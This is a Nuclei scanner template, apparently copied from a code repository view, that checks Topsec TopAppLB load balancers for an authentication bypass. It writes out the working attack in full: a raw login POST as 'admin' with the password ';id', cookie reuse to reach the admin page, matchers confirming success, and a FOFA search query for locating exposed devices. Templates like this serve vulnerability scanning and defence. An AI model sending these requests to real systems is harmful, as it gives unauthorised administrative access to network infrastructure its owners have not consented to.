37 lines
1.0 KiB
YAML
Executable File
37 lines
1.0 KiB
YAML
Executable File
id: topsec-topapplb-auth-bypass
|
|
|
|
info:
|
|
name: Topsec TopAppLB - Authentication Bypass
|
|
author: SleepingBag945
|
|
severity: high
|
|
description: |
|
|
Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`.
|
|
reference:
|
|
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
|
|
metadata:
|
|
fofa-query: title="TopApp-LB 负载均衡系统"
|
|
max-request: 2
|
|
verified: true
|
|
tags: topsec,topapplb,auth-bypass
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /login_check.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
userName=admin&password=%3Bid
|
|
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_1 == 302 && status_code_2 == 200'
|
|
- 'contains(body_2,"var IsHeadMin ")'
|
|
- 'contains(header_1,"redirect.php") && !contains(tolower(header_1), "error=1")'
|
|
condition: and |